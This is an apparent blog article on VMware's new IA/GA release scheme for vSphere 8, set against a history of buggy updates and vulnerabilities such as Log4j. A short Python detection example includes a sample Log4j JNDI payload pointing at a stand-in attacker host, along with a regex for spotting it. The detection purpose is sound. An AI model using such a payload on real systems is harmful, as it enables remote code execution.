Avoid Bugs with the Latest VMware vSphere 8 Update

This autumn at Explore 2022, VMware made several announcements, the biggest being the release of the new vSphere 8 and vSAN 8 platforms. Both the European and American conferences featured many talks about future VMware products and technologies. However, the shift to a new vSphere release schedule went largely unnoticed, and that is what we’re going to talk about today.

Admins with virtual infrastructure experience remember that, many years ago, installing major updates of the primary vSphere components (ESXi and vCenter) right after their release was a risky venture. The reason is simple. More often than not, a major version or a large update package (Update 1/2/3) shipped with numerous bugs. Some did not affect the functioning of the platform, but others could seriously disrupt the workflow or even destroy critical data (which requires recovery time at the very least).

One of the first such cases was the time bomb caused by a licensing bug in VMware Virtual Infrastructure 3.5 (now called vSphere). As a result, users’ licenses were deemed invalid, which made it impossible to run VMs or move them using VMware VMotion (now vMotion). It happened in August 2008, and it scared a LOT of people. VMware had to release critical patches immediately (along with an apology from the CEO).

Interestingly, users were advised to turn off NTP and set the clock on the ESX host back. A workaround like that came as a surprise to a lot of admins back then.

More interesting issues came later. One example is the unexpected reboots that occurred when using Virtual Machine Failure Monitoring (today a part of VMware HA) on VMware ESX 3.5 Update 3 (back then, the hypervisor was the Linux-based ESX rather than ESXi).

You may think that the number of problems in major updates decreased over time. Well, you’re right about that, but only partially. Many of you may remember that after VMware vSphere 5 Update 1, VM Auto Start stopped working for a while for some reason.

Basically, it is no wonder that this happened. VMware has been developing its own hypervisor since the end of the 90s, and a lot of new things have appeared since then, including HA, DRS, vMotion, hardware virtualization, etc. Such a complex product is extremely challenging to maintain and control in every aspect.

The most recent catastrophe, with VMware vSphere 7 Update 3, is the perfect example. Although it happened last year, it took VMware more than a couple of months to come up with a solution, and the problem was fixed only at the beginning of this year. The chronology of events is as follows:

At the end of September 2021, VMware releases vSphere 7 Update 3 with a whole range of new features. The users are more than happy, however…
… in November 2021, because of critical issues, VMware pulls Update 3 back, removes it from the website, and disables the download option.

This update had a lot of problems, and some of them were more than troublesome: PSODs, complications when upgrading from previous versions, vSphere HA stability issues, etc.

In December 2021, users rightly pointed out that the problem had existed for more than a month by then, and that a lot of people had already upgraded their environments to Update 3 before it was pulled back. The primary documentation about this case and the latest update was published on the VMware website.
Finally, it wasn’t until January 2022 that VMware released the final fix as part of VMware vSphere 7 Update 3c. Even though the problem was eventually resolved, a lot of users had a good scare, especially those who had already upgraded their VMware vSphere and couldn’t afford to roll back to the previous version.

These examples show why clients used to be so skeptical about VMware vSphere updates. The main rule was that after any major release, one should wait for the next one and only then upgrade to the previous one. Nothing is surprising about such caution, since the slightest bug can cause serious damage to a large infrastructure and become quite a headache for admins.

Admittedly, this caution had been slowing down the adoption of new solutions a lot, which is why this year VMware opted to change its approach entirely. We now have the IA/GA (Initial Availability/General Availability) model, which makes it possible to align the vSphere release scheme with that of the Cloud Services products within the framework of the vSphere+ subscription. However, its primary purpose is to give users time to detect any serious issues that may appear at the Initial Availability stage.

An IA release is, just as before, a fully enterprise-ready product that is fully tested and meets every VMware standard for a GA-level release. However, it becomes available 4-6 weeks before the official GA release so that feedback can be gathered from VMware partners and clients (and, of course, so that critical issues can be detected in time). All major reported problems will be made public on the VMware blogs.

Now users have enough time to find out whether anything dangerous has happened within these 1-2 months and whether it is safe to upgrade the host servers. Such a scheme is supposed to be more efficient than the previous approach, which basically meant waiting for the next update (vSphere Update X is usually released after about half a year).
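To make the timing concrete, here is a minimal sketch of how one might estimate the expected GA window from an IA date, using the 4-6 week interval mentioned above. The function names, the example date, and the "no critical issues reported" flag are all hypothetical and serve only as an illustration; this is not an official VMware tool or policy.

```python
from datetime import date, timedelta


def expected_ga_window(ia_date: date, min_weeks: int = 4, max_weeks: int = 6) -> tuple[date, date]:
    """Return the (earliest, latest) expected GA dates for a given IA date.

    The 4-6 week default comes from the interval described in the article;
    actual release dates may differ.
    """
    if min_weeks > max_weeks:
        raise ValueError("min_weeks must not exceed max_weeks")
    return ia_date + timedelta(weeks=min_weeks), ia_date + timedelta(weeks=max_weeks)


def safe_to_upgrade(today: date, ia_date: date, critical_issues_reported: bool,
                    min_weeks: int = 4) -> bool:
    """Hypothetical conservative rule: wait at least min_weeks after IA
    and upgrade only if no critical issues have been reported so far."""
    waited_long_enough = (today - ia_date) >= timedelta(weeks=min_weeks)
    return waited_long_enough and not critical_issues_reported


# Example with a made-up IA date (an assumption, not a real release date).
ia = date(2023, 1, 2)
earliest, latest = expected_ga_window(ia)
print(earliest, latest)
```

A cautious admin could run a check like `safe_to_upgrade(date.today(), ia, critical_issues_reported=False)` before scheduling a maintenance window, feeding the flag from whatever issue tracking they already follow.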

That being said, the common scheme of IA/GA releases for VMware vSphere looks something like this:

VMware, as usual, offers three options for deploying the hypervisor:

Base image
Base image with vendor add-on
Vendor image received through the OEM channel

The most interesting thing here is that by doing it VMware essentially admitted that any release can have problems, and that it is not wise to hurry with the upgrade. Well, what are you gonna do? You can’t make an omelette without breaking eggs.

Yet another aspect worth mentioning is security. In the last couple of years, zero-day vulnerabilities have become a primary problem. We have already seen just how serious the vulnerabilities in Intel products (Spectre, for example) and in various VMware services were. It is also worth remembering the issues with VMware Carbon Black, vCenter services, and ransomware encryption of VMDK disks.

If we turn to the Meltdown and Spectre vulnerabilities, it is evident that VMware made the same mistake as before: a patch was released at first, but it was eventually pulled back. These vulnerabilities did not go unnoticed by host hardware vendors either.

And, of course, how could we forget the notorious Log4j vulnerability? It appeared in log4j, the Apache Software Foundation’s Java logging component, which means it affected a lot of VMware products. The vulnerability is described as allowing an attacker who can control log messages or log message parameters to execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. This was a “zero-day” vulnerability, which means that by the time the fix was in progress, it could already have been exploited in thousands of virtual environments all over the world.
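To illustrate what "controlling log messages" means in practice, here is a rough sketch of a check for the lookup syntax that was widely reported for this vulnerability, where a string such as `${jndi:ldap://...}` ends up in a logged message. The function name and the sample strings are hypothetical, and the pattern is deliberately naive: obfuscated or nested lookups would slip past it, so it is an illustration only and not a substitute for patching.

```python
import re

# Naive pattern: matches the literal "${jndi:" prefix, case-insensitively.
# Obfuscated variants (nested lookups, encodings) are NOT covered.
JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.IGNORECASE)


def looks_like_jndi_lookup(message: str) -> bool:
    """Return True if the message contains a plain JNDI lookup expression."""
    return JNDI_LOOKUP.search(message) is not None


# Hypothetical log lines, for illustration only.
samples = [
    "User-Agent: ${jndi:ldap://attacker.example/a}",
    "User admin logged in from 10.0.0.5",
]
for line in samples:
    print(looks_like_jndi_lookup(line), line)
```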

That is exactly why VMware has decided to switch to Initial Availability/General Availability. Strictly speaking, from now on all users have two options: early adopters get the product beforehand at the risk of catching bugs, while large environments upgrade after a couple of months if everything is OK (not six months, as it used to be). Well, at least that’s what VMware offers anyway.

This time, the General Availability release was announced when the number of VMware vSphere downloads reached 18,000, after the release had been waiting for almost two months.

By the way, the General Availability release uses the same image as Initial Availability. That means nothing serious happened this time, which is why the IA/GA scheme will more likely than not be used in the future.

Learn From Your Mistakes: VMware vSphere IA/GA